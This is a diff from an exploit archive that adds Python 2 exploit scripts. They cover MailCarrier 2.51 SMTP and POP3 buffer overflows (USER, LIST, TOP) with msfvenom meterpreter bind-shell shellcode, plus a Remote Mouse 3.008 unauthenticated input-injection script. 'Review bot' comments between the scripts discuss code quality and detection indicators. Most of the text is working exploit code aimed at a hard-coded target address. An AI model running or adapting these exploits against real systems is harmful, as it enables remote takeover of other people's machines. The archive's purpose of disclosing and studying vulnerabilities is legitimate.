+"\x4d\x36\x61\x79\x57\x74\x78\x4d\x30\x32\x55\x7a\x56\x75\x53" +"\x73\x4d\x48\x78\x67\x4b\x61\x6d\x64\x64\x74\x35\x6b\x54\x72" +"\x78\x6e\x6b\x71\x48\x54\x64\x33\x31\x38\x53\x72\x46\x4c\x4b" +"\x44\x4c\x50\x4b\x6e\x6b\x71\x48\x55\x4c\x65\x51\x48\x53\x4e" +"\x6b\x54\x44\x4e\x6b\x76\x61\x5a\x70\x6f\x79\x57\x34\x76\x44" +"\x46\x44\x61\x4b\x31\x4b\x63\x51\x50\x59\x50\x5a\x32\x71\x79" +"\x6f\x59\x70\x51\x4f\x71\x4f\x70\x5a\x6e\x6b\x34\x52\x68\x6b" +"\x6c\x4d\x33\x6d\x53\x58\x74\x73\x44\x72\x67\x70\x53\x30\x52" +"\x48\x52\x57\x53\x43\x36\x52\x53\x6f\x61\x44\x50\x68\x72\x6c" +"\x31\x67\x55\x76\x64\x47\x6b\x4f\x78\x55\x68\x38\x6c\x50\x67" +"\x71\x63\x30\x45\x50\x64\x69\x4f\x34\x62\x74\x50\x50\x72\x48" +"\x54\x69\x4f\x70\x42\x4b\x67\x70\x49\x6f\x6e\x35\x50\x6a\x46" +"\x6b\x56\x39\x62\x70\x78\x62\x79\x6d\x42\x4a\x53\x31\x61\x7a" +"\x56\x62\x43\x58\x49\x7a\x64\x4f\x69\x4f\x59\x70\x4b\x4f\x79" +"\x45\x4f\x67\x73\x58\x56\x62\x57\x70\x67\x71\x4f\x4b\x4b\x39" +"\x4b\x56\x50\x6a\x56\x70\x66\x36\x63\x67\x62\x48\x4a\x62\x6b" +"\x6b\x67\x47\x55\x37\x6b\x4f\x5a\x75\x6f\x75\x49\x50\x33\x45" +"\x53\x68\x53\x67\x31\x78\x6f\x47\x6b\x59\x70\x38\x49\x6f\x59" +"\x6f\x38\x55\x66\x37\x33\x58\x61\x64\x68\x6c\x65\x6b\x38\x61" +"\x79\x6f\x4b\x65\x66\x37\x4e\x77\x52\x48\x73\x45\x62\x4e\x62" +"\x6d\x65\x31\x79\x6f\x7a\x75\x70\x6a\x55\x50\x73\x5a\x36\x64" +"\x71\x46\x56\x37\x72\x48\x56\x62\x38\x59\x4b\x78\x61\x4f\x69" +"\x6f\x69\x45\x4f\x73\x5a\x58\x63\x30\x51\x6e\x66\x4d\x4e\x6b" +"\x74\x76\x72\x4a\x47\x30\x51\x78\x57\x70\x76\x70\x63\x30\x65" +"\x50\x33\x66\x50\x6a\x37\x70\x30\x68\x31\x48\x49\x34\x51\x43" +"\x5a\x45\x49\x6f\x59\x45\x4e\x73\x76\x33\x70\x6a\x33\x30\x76" +"\x36\x52\x73\x53\x67\x52\x48\x66\x62\x6e\x39\x58\x48\x33\x6f" +"\x69\x6f\x4a\x75\x4d\x53\x7a\x58\x43\x30\x73\x4e\x73\x37\x47" +"\x71\x58\x43\x77\x59\x49\x56\x52\x55\x6d\x39\x5a\x63\x4f\x4b" +"\x68\x70\x6e\x55\x6e\x42\x63\x66\x33\x5a\x33\x30\x50\x53\x69" +"\x6f\x58\x55\x41\x41") + +buffer = "A" * 5090 + "\xf7\x56\x44\x7e" + "\x90" * 
20 + shellcode + "B" * 100 + +print "[*] Sending pwnage buffer: with %s bytes" %len(buffer) +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +connect=s.connect(("192.168.0.150", 25)) +print s.recv(1024) +s.send('EHLO root@telspace.co.za \r\n') +print s.recv(1024) +s.send('MAIL FROM: pwnz@telspace.co.za \r\n') +print s.recv(1024) +s.send('RCPT TO: '+ buffer + '\r\n') +print s.recv(1024) +s.send('QUIT\r\n') +s.close() +time.sleep(1) +print "[*] Done, but if you get here the exploit failed!" \ No newline at end of file diff --git a/exploits/windows/remote/46697.py b/exploits/windows/remote/46697.py new file mode 100755 index 000000000..711dba73e --- /dev/null +++ b/exploits/windows/remote/46697.py 
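Review bot: The `RCPT TO:` argument sent here is `"A" * 5090` plus the return address, NOP sled, shellcode and trailer — well over 5,000 bytes — whereas RFC 5321 limits a forward-path to 256 octets, so a mail gateway or IDS rule that enforces that bound on `RCPT TO`/`MAIL FROM` arguments would both block this and surface it as an indicator; the same applies to the POP3 `USER` variant in `46699.py` later in this diff, whose argument is `"A" * 5094` plus payload. The header reads `CVE: TBC from Mitre`, so the listing has no tracking identifier yet, and the target `192.168.0.150` is hard-coded despite the comment `1.) Change ip and port in code`. `connect=s.connect(("192.168.0.150", 25))` binds a variable that is never read (`socket.connect` returns `None`); the bare call is enough.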
@@ -0,0 +1,136 @@ +""" +# Exploit Title: Remote Mouse 3.008 Failure to Authenticate +# Date: 4/9/2019 +# Exploit Author: 0rphon +# Software Link: https://www.remotemouse.net/ +# Version: 3.008 +# Tested on: Windows 10 + +Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it +This script pops calc as proof of concept (albeit a bit slowly) +It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself +""" + +#!/usr/bin/python2 +from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM +from time import sleep +from sys import argv + +def Ping(ip): + try: + target = socket(AF_INET, SOCK_STREAM) + target.settimeout(5) + target.connect((ip, 1978)) + response=target.recv(1048) + target.close() + if response=="SIN 15win nop nop 300": + return True + else: return False + except: + print("ERROR: Request timed out") + + + +def MoveMouse(x,y,ip): + def SendMouse(command,times,ip): + for x in range(times): + target = socket(AF_INET, SOCK_DGRAM) + target.sendto(command,(ip,1978)) + sleep(0.001) + if x>0: + command="mos 5m 1 0" + SendMouse(command,x,ip) + elif x<0: + x=x*-1 + command="mos 5m -1 0" + SendMouse(command,x,ip) + if y>0: + command="mos 5m 0 1" + SendMouse(command,y,ip) + elif y<0: + y=y*-1 + command="mos 6m 0 -1" + SendMouse(command,y,ip) + + + +def MousePress(command,ip,action="click"): + if action=="down": + target = socket(AF_INET, SOCK_DGRAM) + target.sendto((command+" d"),(ip,1978)) + elif action=="up": + target = socket(AF_INET, SOCK_DGRAM) + target.sendto((command+" u"),(ip,1978)) + elif action=="click": + target = socket(AF_INET, SOCK_DGRAM) + target.sendto((command+" d"),(ip,1978)) + target.sendto((command+" u"),(ip,1978)) + else: raise Exception('MousePress: No action named "'+str(action)+'"') + + +def SendString(string,ip): + for char in string: + target = socket(AF_INET, SOCK_DGRAM) + target.sendto(characters[char],(ip,1978)) + + + +class 
mouse: + leftClick="mos 5R l" + rightClick="mos 5R r" + middleClick="mos 5R m" + +characters={ + "A":"key 8[ras]116", "B":"key 8[ras]119", "C":"key 8[ras]118", "D":"key 8[ras]113", "E":"key 8[ras]112", + "F":"key 8[ras]115", "G":"key 8[ras]114", "H":"key 8[ras]125", "I":"key 8[ras]124", "J":"key 8[ras]127", + "K":"key 8[ras]126", "L":"key 8[ras]121", "M":"key 8[ras]120", "N":"key 8[ras]123", "O":"key 8[ras]122", + "P":"key 8[ras]101", "Q":"key 8[ras]100", "R":"key 8[ras]103", "S":"key 8[ras]102", "T":"key 7[ras]97", + "U":"key 7[ras]96", "V":"key 7[ras]99", "W":"key 7[ras]98", "X":"key 8[ras]109", "Y":"key 8[ras]108", + "Z":"key 8[ras]111", + + "a":"key 7[ras]84", "b":"key 7[ras]87", "c":"key 7[ras]86", "d":"key 7[ras]81", "e":"key 7[ras]80", + "f":"key 7[ras]83", "g":"key 7[ras]82", "h":"key 7[ras]93", "i":"key 7[ras]92", "j":"key 7[ras]95", + "k":"key 7[ras]94", "l":"key 7[ras]89", "m":"key 7[ras]88", "n":"key 7[ras]91", "o":"key 7[ras]90", + "p":"key 7[ras]69", "q":"key 7[ras]68", "r":"key 7[ras]71", "s":"key 7[ras]70", "t":"key 7[ras]65", + "u":"key 7[ras]64", "v":"key 7[ras]67", "w":"key 7[ras]66", "x":"key 7[ras]77", "y":"key 7[ras]76", + "z":"key 7[ras]79", + + "1":"key 6[ras]4", "2":"key 6[ras]7", "3":"key 6[ras]6", "4":"key 6[ras]1", "5":"key 6[ras]0", + "6":"key 6[ras]3", "7":"key 6[ras]2", "8":"key 6[ras]13", "9":"key 6[ras]12", "x0":"key 6[ras]5", + + "\n":"key 3RTN", "\b":"key 3BAS", " ":"key 7[ras]21", + + "+":"key 7[ras]30", "=":"key 6[ras]8", "/":"key 7[ras]26", "_":"key 8[ras]106", "<":"key 6[ras]9", + ">":"key 7[ras]11", "[":"key 8[ras]110", "]":"key 8[ras]104", "!":"key 7[ras]20", "@":"key 8[ras]117", + "#":"key 7[ras]22", "$":"key 7[ras]17", "%":"key 7[ras]16", "^":"key 8[ras]107", "&":"key 7[ras]19", + "*":"key 7[ras]31", "(":"key 7[ras]29", ")":"key 7[ras]28", "-":"key 7[ras]24", "'":"key 7[ras]18", + '"':"key 7[ras]23", ":":"key 7[ras]15", ";":"key 7[ras]14", "?":"key 7[ras]10", "`":"key 7[ras]85", + "~":"key 7[ras]75", "\\":"key 8[ras]105", 
"|":"key 7[ras]73", "{":"key 7[ras]78", "}":"key 7[ras]72", + ",":"key 7[ras]25", ".":"key 7[ras]27" +} + + +def PopCalc(ip): + MoveMouse(-5000,3000,ip) + MousePress(mouse.leftClick,ip) + sleep(1) + SendString("calc.exe",ip) + sleep(1) + SendString("\n",ip) + print("SUCCESS! Process calc.exe has run on target",ip) + + +def main(): + try: + targetIP=argv[1] + except: + print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1") + exit() + if Ping(targetIP)==True: + PopCalc(targetIP) + else: + print("ERROR: Target machine is not running RemoteMouse") + exit() + +if __name__=="__main__": + main() \ No newline at end of file diff --git a/exploits/windows/remote/46699.py b/exploits/windows/remote/46699.py new file mode 100755 index 000000000..3a5981651 --- /dev/null +++ b/exploits/windows/remote/46699.py 
@@ -0,0 +1,60 @@ +#!/usr/bin/python +# Exploit Title: MailCarrier 2.51 - Remote Buffer Overflow in "USER" command(POP3) +# Date: 14/04/2019 +# Exploit Author: Dino Covotsos - Telspace Systems +# Vendor Homepage: https://www.tabslab.com/ +# Version: 2.51 +# Software Link: N.A +# Contact: services[@]telspace.co.za +# Twitter: @telspacesystems (Greets to the Telspace Crew) +# Tested on: Windows XP Prof SP3 ENG x86 +# CVE: TBC from Mitre +# Created for the Telspace Internship 2019 - Vanilla EIP Overwrite +# POC +# 1.) Change ip and port in code +# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine +# 0x1b023059 : push esp # ret 0x10 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll) +# Badchars \x00\xd9 + +import sys +import socket +import time + +#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -b "\x00\xd9" -f c +shellcode = ("\x29\xc9\x83\xe9\xb2\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e" +"\x44\x9b\x1b\x0b\x83\xee\xfc\xe2\xf4\xb8\x73\x99\x0b\x44\x9b" +"\x7b\x82\xa1\xaa\xdb\x6f\xcf\xcb\x2b\x80\x16\x97\x90\x59\x50" +"\x10\x69\x23\x4b\x2c\x51\x2d\x75\x64\xb7\x37\x25\xe7\x19\x27" +"\x64\x5a\xd4\x06\x45\x5c\xf9\xf9\x16\xcc\x90\x59\x54\x10\x51" +"\x37\xcf\xd7\x0a\x73\xa7\xd3\x1a\xda\x15\x10\x42\x2b\x45\x48" +"\x90\x42\x5c\x78\x21\x42\xcf\xaf\x90\x0a\x92\xaa\xe4\xa7\x85" +"\x54\x16\x0a\x83\xa3\xfb\x7e\xb2\x98\x66\xf3\x7f\xe6\x3f\x7e" +"\xa0\xc3\x90\x53\x60\x9a\xc8\x6d\xcf\x97\x50\x80\x1c\x87\x1a" +"\xd8\xcf\x9f\x90\x0a\x94\x12\x5f\x2f\x60\xc0\x40\x6a\x1d\xc1" +"\x4a\xf4\xa4\xc4\x44\x51\xcf\x89\xf0\x86\x19\xf3\x28\x39\x44" +"\x9b\x73\x7c\x37\xa9\x44\x5f\x2c\xd7\x6c\x2d\x43\x64\xce\xb3" +"\xd4\x9a\x1b\x0b\x6d\x5f\x4f\x5b\x2c\xb2\x9b\x60\x44\x64\xce" +"\x61\x4f\xc2\x4b\xe9\xb9\xf1\x1a\x61\x46\xf3\xf1\x04\x9b\x7b" +"\xe4\xde\xd3\xf3\x19\x0b\x45\x20\x92\xed\x2e\x8b\x4d\x5c\x2c" 
+"\x59\xc0\x3c\x23\x64\xce\x8e\x84\xee\x43\x5c\x2c\x2c\xf2\x33" +"\xbb\x64\xce\x5c\x2c\xef\xf7\x30\xa5\x64\xce\x5c\xd3\xf3\x6e" +"\x65\x09\xfa\xe4\xde\x2e\x9b\x71\x0f\x12\xcc\x73\x09\x9d\x53" +"\x44\xf4\x91\x18\xe3\x0b\x3a\xb6\x90\x3d\x2e\xdb\x73\x0b\x54" +"\x9b\x1b\x5d\x2e\x9b\x73\x53\xe0\xc8\xfe\xf4\x91\x08\x48\x61" +"\x44\xcd\x48\x5c\x2c\x99\xc2\xc3\x1b\x64\xce\x88\xbc\x9b\x65" +"\x0c\x45\x58\x32\xcd\x31\x72\xd8\xb0\xb4\x2e\xb9\x5d\x2e\x9b" +"\x48\xf4\x91\x9b\x1b\x0b") + +buffer = "A" * 5094 + "\x59\x30\x02\x1b" + "\x90" * 20 + shellcode + "C" * (882-len(shellcode)) + +print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n" +print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +connect=s.connect(("192.168.0.150", 110)) +print s.recv(1024) +s.send('USER ' + buffer + '\r\n') +print s.recv(1024) +s.send('QUIT\r\n') +s.close() +time.sleep(1) +print "[*] Done, but if you get here the exploit failed!" \ No newline at end of file diff --git a/exploits/windows/remote/46700.py b/exploits/windows/remote/46700.py new file mode 100755 index 000000000..67933c963 --- /dev/null +++ b/exploits/windows/remote/46700.py 
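Review bot: The closing `print "[*] Done, but if you get here the exploit failed!"` is unconditional — it follows `s.close()` and `time.sleep(1)` on every path — so each run reports failure regardless of outcome; 46700 ends with the same line while 46701 prints `[*] Done, check for meterpreter shell on port 443 of the target!`, and the three scripts should settle on one wording. `connect=s.connect(("192.168.0.150", 110))` stores the `None` that `socket.connect` returns and never reads it, so the assignment can be dropped (same in 46700 and 46701). From the defender's side the observable is a POP3 `USER` argument of 6000 bytes (`"A" * 5094` plus the fixed 906-byte trailer) where RFC 1939 allows 40 characters per argument, so logging or alerting on oversized POP3 command lines at the listener covers 46699, 46700 and 46701 alike. `CVE: TBC from Mitre` leaves the header without a tracking identifier to backfill once one is issued.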
@@ -0,0 +1,89 @@ +#!/usr/bin/python +# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "LIST" command(POP3) +# Date: 14/04/2019 +# Exploit Author: Dino Covotsos - Telspace Systems +# Vendor Homepage: https://www.tabslab.com/ +# Version: 2.51 +# Software Link: N.A +# Contact: services[@]telspace.co.za +# Twitter: @telspacesystems (Greets to the Telspace Crew) +# Tested on: Windows XP Prof SP3 ENG x86 +# CVE: TBC from Mitre +# Created for the Telspace Internship 2019 - SEH Exploit +# POC +# 1.) Change ip, username, password and port in code +# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine +#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll) +#nseh 6178 seh 6182 +import sys +import socket +import time + +#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c +shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" +"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f" +"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50" +"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63" +"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f" +"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69" +"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72" +"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e" +"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61" +"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33" +"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b" 
+"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46" +"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53" +"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70" +"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b" +"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c" +"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64" +"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59" +"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b" +"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33" +"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c" +"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33" +"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38" +"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74" +"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a" +"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48" +"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69" +"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59" +"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45" +"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b" +"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71" +"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52" +"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44" +"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79" +"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b" +"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75" +"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43" +"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66" +"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f" +"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67" +"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b" +"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69" 
+"\x6f\x78\x55\x41\x41")
+
+buffer = "A" * 6174 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (3798-(len(shellcode)))
+
+print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n"
+print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(("192.168.0.150", 110))
+print s.recv(1024)
+print "[*] Sending USERNAME\r\n"
+s.send('USER test' + '\r\n')
+print s.recv(1024)
+print "[*] Sending PASSWORD\r\n"
+s.send('PASS test' + '\r\n')
+print s.recv(1024)
+print "[*] Sending Evil LIST buffer\r\n"
+s.send('LIST ' + buffer + '\r\n')
+print s.recv(1024)
+s.send('QUIT\r\n')
+s.close()
+time.sleep(1)
+print "[*] Done, but if you get here the exploit failed!"
\ No newline at end of file
diff --git a/exploits/windows/remote/46701.py b/exploits/windows/remote/46701.py
new file mode 100755
index 000000000..e4a5b0b75
--- /dev/null
+++ b/exploits/windows/remote/46701.py
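Review bot: Nothing in the header states that this overflow is post-authentication, although the code shows it — `s.send('USER test' + '\r\n')` and `s.send('PASS test' + '\r\n')` are answered before the oversized `LIST` goes out, and 46701 does the same before `TOP` — whereas the `USER` overflow in 46699 needs no credentials; step 1 only says to change "username, password". Add a header line such as `# Requires valid POP3 credentials; the overflow is in the authenticated LIST handler` and mark the 46700/46701 rows in files_exploits.csv as authenticated, so that defenders can triage 46699 as the pre-auth case and these two as post-auth. The `print s.recv(1024)` after the `LIST` line returns an empty string or raises if the service has already gone down, which deserves a comment since the closing message does not distinguish the two outcomes.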
@@ -0,0 +1,88 @@ +#!/usr/bin/python +# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "TOP" command(POP3) +# Date: 14/04/2019 +# Exploit Author: Dino Covotsos - Telspace Systems +# Vendor Homepage: https://www.tabslab.com/ +# Version: 2.51 +# Software Link: N.A +# Contact: services[@]telspace.co.za +# Twitter: @telspacesystems (Greets to the Telspace Crew) +# Tested on: Windows XP Prof SP3 ENG x86 +# CVE: TBC from Mitre +# Created for the Telspace Internship 2019 - SEH Exploit +# POC +# 1.) Change ip, username, password and port in code +# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine +#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll) +#crash at 6175 +import sys +import socket +import time + +#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c +shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" +"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f" +"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50" +"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63" +"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f" +"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69" +"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72" +"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e" +"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61" +"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33" +"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b" 
+"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46" +"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53" +"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70" +"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b" +"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c" +"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64" +"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59" +"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b" +"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33" +"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c" +"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33" +"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38" +"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74" +"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a" +"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48" +"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69" +"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59" +"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45" +"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b" +"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71" +"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52" +"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44" +"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79" +"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b" +"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75" +"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43" +"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66" +"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f" +"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67" +"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b" +"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69" 
+"\x6f\x78\x55\x41\x41")
+
+buffer = "A" * 6175 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (10000-6883)
+
+print "[*] Mail Server 2.51 POP3 Buffer Overflow in TOP command\r\n"
+print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(("192.168.0.150", 110))
+print s.recv(1024)
+print "[*] Sending USERNAME\r\n"
+s.send('USER test' + '\r\n')
+print s.recv(1024)
+print "[*] Sending PASSWORD\r\n"
+s.send('PASS test' + '\r\n')
+print s.recv(1024)
+print "[*] Sending TOP command plus evil buffer\r\n"
+s.send('TOP ' + buffer + '\r\n')
+s.send('QUIT\r\n')
+s.close()
+time.sleep(1)
+print "[*] Done, check for meterpreter shell on port 443 of the target!"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3876a3306..23a9ef4e4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
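Review bot: The banner `print "[*] Mail Server 2.51 POP3 Buffer Overflow in TOP command\r\n"` names the product "Mail Server" while the title line, the csv row and the sibling scripts 46699/46700 say "MailCarrier 2.51"; change it to `print "[*] MailCarrier 2.51 POP3 Buffer Overflow in TOP command\r\n"`. The padding `"D" * (10000-6883)` hard-codes a number that appears to fold in the shellcode length, whereas 46700 writes `"D" * (3798-(len(shellcode)))` for the same msfvenom payload; using the `len(shellcode)` form here too keeps the two files consistent and makes the 10000-byte total visible. Unlike 46700, no server response is read after `s.send('TOP ' + buffer + '\r\n')` before `QUIT`; a one-line comment on why would make that difference look deliberate rather than an omission.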
@@ -6382,6 +6382,8 @@ id,file,description,date,author,type,platform,port
 46652,exploits/multiple/dos/46652.txt,"Google Chrome 72.0.3626.81 - 'V8TrustedTypePolicyOptions::ToImpl' Type Confusion",2019-04-03,"Google Security Research",dos,multiple,
